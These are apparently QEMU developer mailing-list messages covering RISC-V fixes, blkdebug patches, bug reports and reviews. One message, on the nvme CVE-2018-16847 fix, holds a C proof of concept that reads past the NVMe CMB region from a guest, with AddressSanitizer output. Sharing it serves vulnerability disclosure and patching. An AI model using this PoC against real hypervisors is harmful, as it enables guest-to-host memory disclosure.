At least you don't have review feedback asking you split a patch up to make
it easier to review, after its already been reviewed (what I would call
"make work").

No objections from me. We just have to get these patches into the other
tree which also has RISC-V bug fixes (but I don't have an opinion about
which bugs are more or less critical). There will be some minor merge
conflicts because the RISC-V tree has writable misa suppoer. I'm planning
to rebase at 3.1.0, just so we don't trample on each other. It's probably
going to be quite a lot of work to get the patches in that tree here
because my patches tend to attract a lot of pedantic feedback. i.e. !! to
normalize a scalar into a bool and ~ to broadcast bit 1 e.g. C bitwise
logic that you find frequently in spike; has to be dumbed down into macro
wrappers. Feedback. These changes to keep people happy are the reason why
we broke things for folk like changing gp$ to __globalPointer$ (in
GCC/binutils). Suddendly all earlier asm is broken because someone wants to
give feedback about how RISC-V should be; someone who does not need to bear
the burden of those changes.

Change simply because we can make you change stuff to break things for
RISC-V users because we think those changes are a good idea. Don't get me
wrong. We get good feedback (in QEMU, mostly from RIchard Henderson), but
its not always the case. VSPILL/VFILL and vaddsz sp is a good idea. I need
to find that email of Richard's on the GCC list and forward it to Krste. I
hope the feedback makes it to folk working on the Vector spec because as
far as I can tell it is a good idea.

Apologies for the cynicism. I'll get over it.

* The second half of Alistair's memory leak patch set that I missed last
>   week.
> * A fix to make fclass.d availiable only on RV64IFD systems (without
>   this it's availiable on RV32IFD systems, truncating the result).
> * A fix to make sfence.vm availiable only in priv-1.9.1, and sfence.vma
>   only availiable in priv-1.10.
> * A change to respect fences in user-mode emulators, which were
>   previously treated as NOPs.
>
> As usual, this builds and boot Linux for me.  I don't think I have
> anything else planned for 3.1.0, but I may be wrong as things are a bit
> hectic this week.
>
> 
> Alistair Francis (1):
>   hw/riscv/virt: Free the test device tree node name
>
> Bastian Koppelmann (2):
>   target/riscv: Fix FCLASS_D being treated as RV64 only
>   target/riscv: Fix sfence.vm/a both available in any priv version
>
> Palmer Dabbelt (1):
>   RISC-V: Respect fences for user-only emulators
>
>  hw/riscv/virt.c  |  1 +
>  target/riscv/translate.c | 24 
>  2 files changed, 17 insertions(+), 8 deletions(-)
>
>
>

Re: [Qemu-devel] [PULL V2 24/26] net: ignore packet size greater than INT_MAX

[Jason Wang]

On 2018/11/13 下午11:41, Dima Stepanov wrote:

Hi Jason,

I know that this patch has been already merged to stable, but i have a
question:

On Fri, Oct 19, 2018 at 11:22:23AM +0800, Jason Wang wrote:

There should not be a reason for passing a packet size greater than
INT_MAX. It's usually a hint of bug somewhere, so ignore packet size
greater than INT_MAX in qemu_deliver_packet_iov()

CC:qemu-sta...@nongnu.org
Reported-by: Daniel Shapira
Reviewed-by: Michael S. Tsirkin
Signed-off-by: Jason Wang
---
  net/net.c | 7 ++-
  1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/net/net.c b/net/net.c
index c66847e..07c194a 100644
--- a/net/net.c
+++ b/net/net.c
@@ -712,10 +712,15 @@ ssize_t qemu_deliver_packet_iov(NetClientState *sender,
  void *opaque)
  {
  NetClientState *nc = opaque;
+size_t size = iov_size(iov, iovcnt);
  int ret;
  
+if (size > INT_MAX) {

+return size;

Is it okay that the function returns ssize_t (signed), but the type of the
size variable is size_t (unsigned)? For now the top level routine checks
the return value only for 0, but anyway we can return negative value
here instead of positive. What do you think?

Regards, Dima.



Any non zero value should be ok here. Actually I think because of the 
conversion from size_t to ssize_t, caller actually see negative value?


Thanks

Re: [Qemu-devel] [PULL 4/4] RISC-V: Respect fences for user-only emulators

[Michael Clark]

Nits. Please improve your commit message to make them more impersonal...

On Wed, Nov 14, 2018 at 12:52 PM Palmer Dabbelt  wrote:

> Our current fence implementation ignores fences for the user-only
> configurations.  This is incorrect but unlikely to manifest: it requires
> multi-threaded user-only code that takes advantage of the weakness in
> the host's memory model and can be inlined by TCG.
>

The RISC-V fence implementation...


> This patch simply treats fences the same way for all our emulators.
> I've given it to testing as I don't want to construct a test that would
> actually trigger the failure.
>

Testing has been limited to... ? Reproducer?


> Our fence implementation has an additional deficiency where we map all
> RISC-V fences to full fences.  Now that we have a formal memory model
> for RISC-V we can start to take advantage of the strength bits on our
> fence instructions.  This requires a bit more though, so I'm going to
> split it out because the implementation is still correct without taking
> advantage of these weaker fences.
>

The fence implementation...

A formal memory model for RISC-V allows...


> Thanks to Richard Henderson for pointing out both of the issues.
>
> Signed-off-by: Palmer Dabbelt 
> Reviewed-by: Alistair Francis 
> Reviewed-by: Richard Henderson 


Assuming you fix up the commit message. I am not sure if I am present in
any of the commit messages I wrote, however perhaps thats just a matter
style with respect to writing (or re-writing) history.

Reviewed-by: Michael Clark 

---
>  target/riscv/translate.c | 2 --
>  1 file changed, 2 deletions(-)
>
> diff --git a/target/riscv/translate.c b/target/riscv/translate.c
> index f44eb9c41b48..312bf298b3c2 100644
> --- a/target/riscv/translate.c
> +++ b/target/riscv/translate.c
> @@ -1776,7 +1776,6 @@ static void decode_RV32_64G(CPURISCVState *env,
> DisasContext *ctx)
>   GET_RM(ctx->opcode));
>  break;
>  case OPC_RISC_FENCE:
> -#ifndef CONFIG_USER_ONLY
>  if (ctx->opcode & 0x1000) {
>  /* FENCE_I is a no-op in QEMU,
>   * however we need to end the translation block */
> @@ -1787,7 +1786,6 @@ static void decode_RV32_64G(CPURISCVState *env,
> DisasContext *ctx)
>  /* FENCE is a full memory barrier. */
>  tcg_gen_mb(TCG_MO_ALL | TCG_BAR_SC);
>  }
> -#endif
>  break;
>  case OPC_RISC_SYSTEM:
>  gen_system(env, ctx, MASK_OP_SYSTEM(ctx->opcode), rd, rs1,
> --
> 2.18.1
>
>
>

Re: [Qemu-devel] [PATCH] nvme: fix oob access issue(CVE-2018-16847)

[Li Qiang]

Paolo Bonzini  于2018年11月14日周三 上午2:27写道：

> On 13/11/2018 11:17, Kevin Wolf wrote:
> > Am 13.11.2018 um 02:45 hat Li Qiang geschrieben:
> >> Ping what't the status of this patch.
> >>
> >> I see Kevin's new pr doesn't contain this patch.
> >
> > Oh, I thought you said that you wanted to fix this at a higher level so
> > that the problem is caught before even getting into nvme code? If you
> > don't, I can apply the patch for my next pull request.
>
> As far as I know the bug doesn't exist.  Li Qiang, if you have a
> reproducer please send it.
>
>
Hello Paolo,
Though I've send the debug information and ASAN output in the mail to
secal...@redhat.com, I'm glad provide here.
This is for read, I think the write the same but as the PoC is in
userspace, the mmap can only map the exact size of the MMIO,
So we can only write within the area. But if we using a module we can write
the out of MMIO I think
The nvme device's parameter should set as 'cmb_size_mb=2' and the PCI
address may differ in your system.

Thanks,
Li Qiang

#include 
#include 
#include 
#include 
#include 

int main(int argc, char **argv)
{
char *filename = "/sys/bus/pci/devices/:00:04.0/resource2";
uint32_t size = 2*1024*1024;
char *mmio = NULL;
int fd = open(filename, O_RDWR);
if (fd < 0) {
printf("open file error\n");
exit(1);
}
mmio = mmap(NULL, size, PROT_WRITE | PROT_READ, MAP_SHARED, fd, 0);
if (mmio == MAP_FAILED) {
printf("mmap error\n");
exit(1);
}
int x = *(uint64_t*)(mmio+size-1);
}

read:

[Switching to Thread 0x7fffc7326700 (LWP 52799)]

Thread 4 "qemu-system-x86" hit Breakpoint 1, nvme_cmb_read
(opaque=0x624b8100, addr=2097151, size=2) at hw/block/nvme.c:1182
1182 {
(gdb) p /x addr
$1 = 0x1f
(gdb) p /x addr+size
$2 = 0x21
(gdb) c
Continuing.
=
[Thread 0x7fff77efd700 (LWP 54057) exited]
==52793==ERROR: AddressSanitizer: heap-buffer-overflow on address
0x7fff817ff800 at pc 0x76e9af7f bp 0x7fffc7322fc0 sp 0x7fffc7322770
READ of size 2 at 0x7fff817ff800 thread T3
[Thread 0x7fff7a183700 (LWP 53957) exited]
[Thread 0x7fff786fe700 (LWP 53953) exited]
[Thread 0x7fff70b21700 (LWP 53952) exited]
#0 0x76e9af7e  (/usr/lib/x86_64-linux-gnu/libasan.so.3+0x5cf7e)
#1 0x562193b3 in nvme_cmb_read hw/block/nvme.c:1186
#2 0x55d630d0 in memory_region_read_accessor
/home/liqiang02/qemu-upstream/qemu/memory.c:440
#3 0x55d638da in access_with_adjusted_size
/home/liqiang02/qemu-upstream/qemu/memory.c:570
#4 0x55d690fd in memory_region_dispatch_read1
/home/liqiang02/qemu-upstream/qemu/memory.c:1375
#5 0x55d692b5 in memory_region_dispatch_read
/home/liqiang02/qemu-upstream/qemu/memory.c:1404
#6 0x55ca765b in flatview_read_continue
/home/liqiang02/qemu-upstream/qemu/exec.c:3294
#7 0x55ca790d in flatview_read
/home/liqiang02/qemu-upstream/qemu/exec.c:3332
#8 0x55ca79d3 in address_space_read_full
/home/liqiang02/qemu-upstream/qemu/exec.c:3345
#9 0x55ca7aaa in address_space_rw
/home/liqiang02/qemu-upstream/qemu/exec.c:3375
#10 0x55daadd9 in kvm_cpu_exec
/home/liqiang02/qemu-upstream/qemu/accel/kvm/kvm-all.c:2031
#11 0x55d2b2e5 in qemu_kvm_cpu_thread_fn
/home/liqiang02/qemu-upstream/qemu/cpus.c:1277
#12 0x56a037a0 in qemu_thread_start util/qemu-thread-posix.c:498
#13 0x7fffdadbd493 in start_thread
(/lib/x86_64-linux-gnu/libpthread.so.0+0x7493)
#14 0x7fffdaafface in __clone (/lib/x86_64-linux-gnu/libc.so.6+0xe8ace)




> Prasad, please revoke the CVE.
>
> Paolo
>
>

Re: [Qemu-devel] [PATCH for-4.0 00/17] tcg: Move softmmu out-of-line

[Emilio G. Cota]

On Mon, Nov 12, 2018 at 22:44:46 +0100, Richard Henderson wrote:
> Based on an idea forwarded by Emilio, which suggests a 5-6%
> speed gain is possible.  I have not spent too much time
> measuring this, as the code size gains are significant.

Nice!

> I believe that I posted an x86_64-only patch some time ago,
> but this now includes i386, aarch64 and arm32.  In late
> testing I do some failures on i386, for sparc guest.  I'll
> follow up on that later.

The following might be related: I'm seeing segfaults with -smp 8
and beyond when doing bootup+shutdown of an aarch64 guest on
an x86-64 host. smp -1 is stable AFAICT. The first commit that
shows these crashes is "tcg/i386: Use TCG_TARGET_NEED_LDST_OOL_LABELS",
that is f7ec49a51c8 in your tcg-tlb-x86 github branch.

Thanks,

Emilio

Re: [Qemu-devel] [Bug 1802150] Re: Guest undefined when destroyed on host after migration

[Dan Midthun]

The logs for the VM that gets undefined are no longer available.


Thanks,
   Dan


On 11/12/2018 01:26 PM, Dr. David Alan Gilbert wrote:
> Also, can you please include the libvirt logs for the VM, they're
> typically in /var/log/libvirt/VMNAME.log
>

-- 
You received this bug notification because you are a member of qemu-
devel-ml, which is subscribed to QEMU.
https://bugs.launchpad.net/bugs/1802150

Title:
  Guest undefined when destroyed on host after migration

Status in QEMU:
  Incomplete

Bug description:
  After a live migration, guest VMs are being undefined from the host
  they were migrated to after shutdown. I have experienced this at two
  (2) separate locations on more than one hardware configuration.  This
  happens when utilizing virt-manager to view current allocations on
  hosts, and virsh on the CLI to migrate guests.  When the guest is
  migrated from one host to another, no errors are thrown, and only lose
  1 packet from infinite ping. Shutting guest down *from* the guest OS
  results in the Guest VM being undefined on the residing host, and XML
  config lost.  If needed, I can provide a recorded session of this
  happening.

  Thanks,
Dan

To manage notifications about this bug go to:
https://bugs.launchpad.net/qemu/+bug/1802150/+subscriptions

Re: [Qemu-devel] [PATCH] tests/ide: Free pcibus when finishing a test

[John Snow]

On 11/13/18 10:11 AM, Thomas Huth wrote:
> Once a test has finished, the pcibus structure should be freed, to
> avoid leaking memory and to make sure that the structure is properly
> re-initialized when the next test starts.
> 
> Signed-off-by: Thomas Huth 
> ---
>  tests/ide-test.c | 4 
>  1 file changed, 4 insertions(+)
> 
> diff --git a/tests/ide-test.c b/tests/ide-test.c
> index 33cef61..f0280e6 100644
> --- a/tests/ide-test.c
> +++ b/tests/ide-test.c
> @@ -142,6 +142,10 @@ static void ide_test_start(const char *cmdline_fmt, ...)
>  
>  static void ide_test_quit(void)
>  {
> +if (pcibus) {
> +qpci_free_pc(pcibus);
> +pcibus = NULL;
> +}
>  pc_alloc_uninit(guest_malloc);
>  guest_malloc = NULL;
>  qtest_end();
> 

Reviewed-by: John Snow 

Thanks; I have nothing else queued at the moment, someone else can take
this for now if convenient -- or if I'm being too lazy, let me know and
I'll stage this.

Thanks.

Re: [Qemu-devel] [PATCH] Fix for crashes and non-responsive UI on macOS Mojave

[Programmingkid]

> On Nov 11, 2018, at 4:35 PM, qemu-devel-requ...@nongnu.org wrote:
> 
> It seems that Cocoa checks are stricter on Mojave and some callbacks that 
> worked from non-GUI thread on High Sierra are no longer working.
> 
> The fixes included here are:
> 
> * Deferring qemu_main() to another thread so that the actual main thread is 
> reserved for the Cocoa UI; it also removes blocking from 
> applicationDidFinishLoading: delegate. I beleive this alone caused complete 
> UI blockage on Mojave.
> * Deferring UI-related updates in callbacks to the UI thread using 
> invokeOnMainThread helper function. This function uses DDInvocationGrabber 
> object courtesy of Dave Dribin, licensed under MIT license.
> Here?s relevant blog post for his code: 
> https://www.dribin.org/dave/blog/archives/2008/05/22/invoke_on_main_thread/
> 
> NSInvocation is used here instead of plain 
> performSelectorOnMainThread:withObject:waitUntilDone: because we want to be 
> able to pass non-id types to the handlers.

Also I realized that the only way we could call cocoa_refresh() from 
performSelectorOnMainThread:withObject:waitUntilDone: would be to add it to a 
class. 

> These changes are ought to work on OSX 10.6, although I don?t have a machine 
> handy to test it.
> 
> Fixes https://bugs.launchpad.net/qemu/+bug/1802684
> 
> From 8f86e30f3710d782d78dccdbe7a1564ae79220c7 Mon Sep 17 00:00:00 2001
> From: Berkus Decker 
> Date: Sun, 11 Nov 2018 21:58:17 +0200
> Subject: [PATCH 1/2] ui/cocoa: Defer qemu to another thread, leaving main
> thread for the UI



I tried both patch 1 and 2 together on Mac OS 10.12. Both qemu-system-i386 and 
qemu-system-ppc do not load their BIOS files. All I see is a black window each 
time. There is no indication of anything loading. The Machine menu doesn't 
populate with devices. Sorry. 

Re: [Qemu-devel] [Bug 1802150] Re: Guest undefined when destroyed on host after migration

[Dan Midthun]

This was done with virsh on the cli - not through virt-manager. Virt 
manager was only used to see the visual residence of the vm. The exact 
command is below:


virsh migrate 79fdd9dd-068b-41cc-b97b-d0f9d8e9df84 --desturi 
qemu+ssh://kvmadmin@192.168.0.84/system

after migrating, shutting down the guest vm results in destruction of vm 
(undefined)


Thanks,
   Dan


On 11/07/2018 02:33 PM, Thomas Huth wrote:
> This is the QEMU bug tracker here ... Can you also reproduce such an
> issue with plain QEMU? If not, could you please report this to the virt-
> manager project first? See https://virt-manager.org/bugs/#report for
> details.
>
> ** Changed in: qemu
> Status: New => Incomplete
>

-- 
You received this bug notification because you are a member of qemu-
devel-ml, which is subscribed to QEMU.
https://bugs.launchpad.net/bugs/1802150

Title:
  Guest undefined when destroyed on host after migration

Status in QEMU:
  Incomplete

Bug description:
  After a live migration, guest VMs are being undefined from the host
  they were migrated to after shutdown. I have experienced this at two
  (2) separate locations on more than one hardware configuration.  This
  happens when utilizing virt-manager to view current allocations on
  hosts, and virsh on the CLI to migrate guests.  When the guest is
  migrated from one host to another, no errors are thrown, and only lose
  1 packet from infinite ping. Shutting guest down *from* the guest OS
  results in the Guest VM being undefined on the residing host, and XML
  config lost.  If needed, I can provide a recorded session of this
  happening.

  Thanks,
Dan

To manage notifications about this bug go to:
https://bugs.launchpad.net/qemu/+bug/1802150/+subscriptions

Re: [Qemu-devel] [PATCH] slirp: add tftp tracing

[Samuel Thibault]

Gerd Hoffmann, le mar. 13 nov. 2018 08:03:20 +0100, a ecrit:
> Useful when debugging pxeboot, to see what the guest tries to do.

Applied to my tree, thanks!

Samuel

Re: [Qemu-devel] [PATCH for-3.2 3/7] ahci-test: Drop dependence on global_qtest

[John Snow]

On 11/12/18 2:08 PM, Thomas Huth wrote:
> From: Eric Blake 
> 
> Managing parallel connections to two different monitors via
> the implicit global_qtest makes it hard to copy-and-paste code
> to tests that are not aware of the implicit state; the
> management of global_qtest is even harder to follow because
> it was masked behind set_context().
> 
> Instead, explicitly pass QTestState* around (generally, by
> reusing the member already present in ahci->parent QOSState),
> and call explicit qtest_* functions on all places that
> interact with a monitor.
> 
> We can assert that the conversion is correct by checking that
> global_qtest remains NULL throughout the test (a later patch
> that changes global_qtest to not be a public global variable
> will drop the assertions).
> 
> Bonus: there was one spots that was creating a needless temporary
> variable to execute the 'cont' command, rather than just directly
> passing the literal command through qtest_qmp().  Fixing that
> gets us one step closer to enabling -Wformat checking on
> constructed JSON.
> 
> Signed-off-by: Eric Blake 
> [thuth: rebased patch to current master branch]
> Signed-off-by: Thomas Huth 

This one's from a while back!

Acked-by: John Snow 

Re: [Qemu-devel] [PATCH v3 3/3] blkdebug: Add latency injection rule type

[John Snow]

On 11/12/18 2:06 AM, Marc Olson via Qemu-devel wrote:
> Add a new rule type for blkdebug that instead of returning an error, can
> inject latency to an IO.
> 
> Signed-off-by: Marc Olson 
> ---
>  block/blkdebug.c   | 79 
> +++---
>  docs/devel/blkdebug.txt| 35 ++--
>  qapi/block-core.json   | 31 ++
>  tests/qemu-iotests/071 | 63 
>  tests/qemu-iotests/071.out | 31 ++
>  5 files changed, 226 insertions(+), 13 deletions(-)
> 
> diff --git a/block/blkdebug.c b/block/blkdebug.c
> index 7739849..6b1f2d6 100644
> --- a/block/blkdebug.c
> +++ b/block/blkdebug.c
> @@ -65,6 +65,7 @@ typedef struct BlkdebugSuspendedReq {
>  
>  enum {
>  ACTION_INJECT_ERROR,
> +ACTION_INJECT_DELAY,
>  ACTION_SET_STATE,
>  ACTION_SUSPEND,
>  };
> @@ -81,6 +82,9 @@ typedef struct BlkdebugRule {
>  int immediately;
>  } inject_error;
>  struct {
> +int64_t latency;
> +} delay;
> +struct {
>  int new_state;
>  } set_state;
>  struct {
> @@ -123,6 +127,34 @@ static QemuOptsList inject_error_opts = {
>  },
>  };
>  
> +static QemuOptsList inject_delay_opts = {
> +.name = "inject-delay",
> +.head = QTAILQ_HEAD_INITIALIZER(inject_delay_opts.head),
> +.desc = {
> +{
> +.name = "event",
> +.type = QEMU_OPT_STRING,
> +},
> +{
> +.name = "state",
> +.type = QEMU_OPT_NUMBER,
> +},
> +{
> +.name = "latency",
> +.type = QEMU_OPT_NUMBER,
> +},
> +{
> +.name = "sector",
> +.type = QEMU_OPT_NUMBER,
> +},
> +{
> +.name = "once",
> +.type = QEMU_OPT_BOOL,
> +},
> +{ /* end of list */ }
> +},
> +};
> +

Lot of redundancy again, but ... it's just a debugging interface, so...

>  static QemuOptsList set_state_opts = {
>  .name = "set-state",
>  .head = QTAILQ_HEAD_INITIALIZER(set_state_opts.head),
> @@ -145,6 +177,7 @@ static QemuOptsList set_state_opts = {
>  
>  static QemuOptsList *config_groups[] = {
>  _error_opts,
> +_delay_opts,
>  _state_opts,
>  NULL
>  };
> @@ -194,6 +227,11 @@ static int add_rule(void *opaque, QemuOpts *opts, Error 
> **errp)
>  qemu_opt_get_bool(opts, "immediately", 0);
>  break;
>  
> +case ACTION_INJECT_DELAY:
> +rule->options.delay.latency =
> +qemu_opt_get_number(opts, "latency", 100) * SCALE_US;
> +break;
> +
>  case ACTION_SET_STATE:
>  rule->options.set_state.new_state =
>  qemu_opt_get_number(opts, "new_state", 0);
> @@ -226,6 +264,12 @@ static void remove_rule(BlkdebugRule *rule)
>  g_free(rule);
>  }
>  
> +static void remove_active_rule(BDRVBlkdebugState *s, BlkdebugRule *rule)
> +{
> +QSIMPLEQ_REMOVE(>active_rules, rule, BlkdebugRule, active_next);
> +remove_rule(rule);
> +}
> +
>  static int read_config(BDRVBlkdebugState *s, const char *filename,
> QDict *options, Error **errp)
>  {
> @@ -264,6 +308,14 @@ static int read_config(BDRVBlkdebugState *s, const char 
> *filename,
>  goto fail;
>  }
>  
> +d.action = ACTION_INJECT_DELAY;
> +qemu_opts_foreach(_delay_opts, add_rule, , _err);
> +if (local_err) {
> +error_propagate(errp, local_err);
> +ret = -EINVAL;
> +goto fail;
> +}
> +
>  d.action = ACTION_SET_STATE;
>  qemu_opts_foreach(_state_opts, add_rule, , _err);
>  if (local_err) {
> @@ -275,6 +327,7 @@ static int read_config(BDRVBlkdebugState *s, const char 
> *filename,
>  ret = 0;
>  fail:
>  qemu_opts_reset(_error_opts);
> +qemu_opts_reset(_delay_opts);
>  qemu_opts_reset(_state_opts);
>  if (f) {
>  fclose(f);
> @@ -474,7 +527,8 @@ static int rule_check(BlockDriverState *bs, uint64_t 
> offset, uint64_t bytes)
>  {
>  BDRVBlkdebugState *s = bs->opaque;
>  BlkdebugRule *rule = NULL;
> -BlkdebugRule *error_rule = NULL;
> +BlkdebugRule *error_rule = NULL, *delay_rule = NULL;
> +int64_t latency;
>  int error;
>  bool immediately;
>  int ret = 0;
> @@ -484,20 +538,36 @@ static int rule_check(BlockDriverState *bs, uint64_t 
> offset, uint64_t bytes)
>  (bytes && rule->offset >= offset &&
>   rule->offset < offset + bytes))
>  {
> -if (rule->action == ACTION_INJECT_ERROR) {
> +if (!error_rule && rule->action == ACTION_INJECT_ERROR) {
>  error_rule = rule;
> +} else if (!delay_rule && rule->action == ACTION_INJECT_DELAY) {
> +delay_rule = rule;
> +}
> +
> +if (error_rule && delay_rule) {
>  break;
>  }
>  }
>  }
>  
> +if 

[Qemu-devel] [PULL 2/4] target/riscv: Fix FCLASS_D being treated as RV64 only

[Palmer Dabbelt]

From: Bastian Koppelmann 

Signed-off-by: Bastian Koppelmann 
Reviewed-by: Richard Henderson 
Signed-off-by: Palmer Dabbelt 
---
 target/riscv/translate.c | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/target/riscv/translate.c b/target/riscv/translate.c
index 18d7b6d1471d..5359088e24bc 100644
--- a/target/riscv/translate.c
+++ b/target/riscv/translate.c
@@ -1237,13 +1237,14 @@ static void gen_fp_arith(DisasContext *ctx, uint32_t 
opc, int rd,
 tcg_temp_free(t0);
 break;
 
-#if defined(TARGET_RISCV64)
 case OPC_RISC_FMV_X_D:
 /* also OPC_RISC_FCLASS_D */
 switch (rm) {
+#if defined(TARGET_RISCV64)
 case 0: /* FMV */
 gen_set_gpr(rd, cpu_fpr[rs1]);
 break;
+#endif
 case 1:
 t0 = tcg_temp_new();
 gen_helper_fclass_d(t0, cpu_fpr[rs1]);
@@ -1255,6 +1256,7 @@ static void gen_fp_arith(DisasContext *ctx, uint32_t opc, 
int rd,
 }
 break;
 
+#if defined(TARGET_RISCV64)
 case OPC_RISC_FMV_D_X:
 t0 = tcg_temp_new();
 gen_get_gpr(t0, rs1);
-- 
2.18.1

[Qemu-devel] [PULL 1/4] hw/riscv/virt: Free the test device tree node name

[Palmer Dabbelt]

From: Alistair Francis 

Signed-off-by: Alistair Francis 
Signed-off-by: Palmer Dabbelt 
---
 hw/riscv/virt.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/hw/riscv/virt.c b/hw/riscv/virt.c
index 4a137a503c8a..2b38f890702c 100644
--- a/hw/riscv/virt.c
+++ b/hw/riscv/virt.c
@@ -240,6 +240,7 @@ static void *create_fdt(RISCVVirtState *s, const struct 
MemmapEntry *memmap,
 qemu_fdt_setprop_cells(fdt, nodename, "reg",
 0x0, memmap[VIRT_TEST].base,
 0x0, memmap[VIRT_TEST].size);
+g_free(nodename);
 
 nodename = g_strdup_printf("/uart@%lx",
 (long)memmap[VIRT_UART0].base);
-- 
2.18.1

[Qemu-devel] [PULL 3/4] target/riscv: Fix sfence.vm/a both available in any priv version

[Palmer Dabbelt]

From: Bastian Koppelmann 

sfence.vm has been replaced in priv v1.10 spec by sfence.vma.

Reported-by: Richard Henderson 
Signed-off-by: Bastian Koppelmann 
Reviewed-by: Richard Henderson 
Signed-off-by: Palmer Dabbelt 
---
 target/riscv/translate.c | 18 +-
 1 file changed, 13 insertions(+), 5 deletions(-)

diff --git a/target/riscv/translate.c b/target/riscv/translate.c
index 5359088e24bc..f44eb9c41b48 100644
--- a/target/riscv/translate.c
+++ b/target/riscv/translate.c
@@ -1292,10 +1292,14 @@ static void gen_system(CPURISCVState *env, DisasContext 
*ctx, uint32_t opc,
 #ifndef CONFIG_USER_ONLY
 /* Extract funct7 value and check whether it matches SFENCE.VMA */
 if ((opc == OPC_RISC_ECALL) && ((csr >> 5) == 9)) {
-/* sfence.vma */
-/* TODO: handle ASID specific fences */
-gen_helper_tlb_flush(cpu_env);
-return;
+if (env->priv_ver == PRIV_VERSION_1_10_0) {
+/* sfence.vma */
+/* TODO: handle ASID specific fences */
+gen_helper_tlb_flush(cpu_env);
+return;
+} else {
+gen_exception_illegal(ctx);
+}
 }
 #endif
 
@@ -1342,7 +1346,11 @@ static void gen_system(CPURISCVState *env, DisasContext 
*ctx, uint32_t opc,
 gen_helper_wfi(cpu_env);
 break;
 case 0x104: /* SFENCE.VM */
-gen_helper_tlb_flush(cpu_env);
+if (env->priv_ver <= PRIV_VERSION_1_09_1) {
+gen_helper_tlb_flush(cpu_env);
+} else {
+gen_exception_illegal(ctx);
+}
 break;
 #endif
 default:
-- 
2.18.1

[Qemu-devel] [PULL 4/4] RISC-V: Respect fences for user-only emulators

[Palmer Dabbelt]

Our current fence implementation ignores fences for the user-only
configurations.  This is incorrect but unlikely to manifest: it requires
multi-threaded user-only code that takes advantage of the weakness in
the host's memory model and can be inlined by TCG.

This patch simply treats fences the same way for all our emulators.
I've given it to testing as I don't want to construct a test that would
actually trigger the failure.

Our fence implementation has an additional deficiency where we map all
RISC-V fences to full fences.  Now that we have a formal memory model
for RISC-V we can start to take advantage of the strength bits on our
fence instructions.  This requires a bit more though, so I'm going to
split it out because the implementation is still correct without taking
advantage of these weaker fences.

Thanks to Richard Henderson for pointing out both of the issues.

Signed-off-by: Palmer Dabbelt 
Reviewed-by: Alistair Francis 
Reviewed-by: Richard Henderson 
---
 target/riscv/translate.c | 2 --
 1 file changed, 2 deletions(-)

diff --git a/target/riscv/translate.c b/target/riscv/translate.c
index f44eb9c41b48..312bf298b3c2 100644
--- a/target/riscv/translate.c
+++ b/target/riscv/translate.c
@@ -1776,7 +1776,6 @@ static void decode_RV32_64G(CPURISCVState *env, 
DisasContext *ctx)
  GET_RM(ctx->opcode));
 break;
 case OPC_RISC_FENCE:
-#ifndef CONFIG_USER_ONLY
 if (ctx->opcode & 0x1000) {
 /* FENCE_I is a no-op in QEMU,
  * however we need to end the translation block */
@@ -1787,7 +1786,6 @@ static void decode_RV32_64G(CPURISCVState *env, 
DisasContext *ctx)
 /* FENCE is a full memory barrier. */
 tcg_gen_mb(TCG_MO_ALL | TCG_BAR_SC);
 }
-#endif
 break;
 case OPC_RISC_SYSTEM:
 gen_system(env, ctx, MASK_OP_SYSTEM(ctx->opcode), rd, rs1,
-- 
2.18.1

[Qemu-devel] [PR RFC] RISC-V Patches for 3.1-rc2

[Palmer Dabbelt]

The following changes since commit cb968d275c145467c8b385a3618a207ec111eab1:

  Update version for v3.1.0-rc1 release (2018-11-13 18:16:14 +)

are available in the Git repository at:

  git://github.com/riscv/riscv-qemu.git tags/riscv-for-master-3.1-rc2

for you to fetch changes up to 3502dc824a7b0218abb49f4350e80a49829748cf:

  RISC-V: Respect fences for user-only emulators (2018-11-13 15:12:15 -0800)


RISC-V Patches for 3.1-rc2

This pull request contains four patches that aren't really related to
each other aside from all being bug fixes that I think should go in for
3.1.0:

* The second half of Alistair's memory leak patch set that I missed last
  week.
* A fix to make fclass.d availiable only on RV64IFD systems (without
  this it's availiable on RV32IFD systems, truncating the result).
* A fix to make sfence.vm availiable only in priv-1.9.1, and sfence.vma
  only availiable in priv-1.10.
* A change to respect fences in user-mode emulators, which were
  previously treated as NOPs.

As usual, this builds and boot Linux for me.  I don't think I have
anything else planned for 3.1.0, but I may be wrong as things are a bit
hectic this week.


Alistair Francis (1):
  hw/riscv/virt: Free the test device tree node name

Bastian Koppelmann (2):
  target/riscv: Fix FCLASS_D being treated as RV64 only
  target/riscv: Fix sfence.vm/a both available in any priv version

Palmer Dabbelt (1):
  RISC-V: Respect fences for user-only emulators

 hw/riscv/virt.c  |  1 +
 target/riscv/translate.c | 24 
 2 files changed, 17 insertions(+), 8 deletions(-)

Re: [Qemu-devel] [PATCH v3 2/3] blkdebug: Extend rule check for additional types

[John Snow]

On 11/13/18 6:34 PM, Marc Olson wrote:
> On 11/13/18 3:22 PM, John Snow wrote:
>>
>> On 11/12/18 2:06 AM, Marc Olson via Qemu-devel wrote:
>>> Break out the more common parts of the BlkdebugRule struct, and make
>>> rule_check() more explicit about operating only on error injection types
>>> so that additional rule types can be added in the future.
>>>
>>> Signed-off-by: Marc Olson 
>>> ---
>>>   block/blkdebug.c | 59
>>> +---
>>>   1 file changed, 31 insertions(+), 28 deletions(-)
>>>
>>> diff --git a/block/blkdebug.c b/block/blkdebug.c
>>> index 327049b..7739849 100644
>>> --- a/block/blkdebug.c
>>> +++ b/block/blkdebug.c
>>> @@ -73,13 +73,13 @@ typedef struct BlkdebugRule {
>>>   BlkdebugEvent event;
>>>   int action;
>>>   int state;
>>> +    int once;
>>> +    int64_t offset;
>>>   union {
>>>   struct {
>>>   int error;
>>>   int immediately;
>>> -    int once;
>>> -    int64_t offset;
>>> -    } inject;
>>> +    } inject_error;
>> ...pulling out "once" and "offset" from inject_error (renamed inject) to
>> shared properties. Fine, though this looks like it could use more love.
>> Not your doing.
>>
>> This adds new dead fields for set_state and suspend which will now work,
>> but hopefully not do anything.
> 
> 
> I think set_state was already there?
> 

Yes, I just mean to say that "once" and "offset" now get defined for
set_state tagged rules, and could theoretically be specified by the user
(I think?) I don't think it will change anything. Just pointing it out
in case anyone knows better than I do.

>>
>>>   struct {
>>>   int new_state;
>>>   } set_state;
>>> @@ -182,16 +182,16 @@ static int add_rule(void *opaque, QemuOpts
>>> *opts, Error **errp)
>>>   .state  = qemu_opt_get_number(opts, "state", 0),
>>>   };
>>>   +    rule->once = qemu_opt_get_bool(opts, "once", 0);
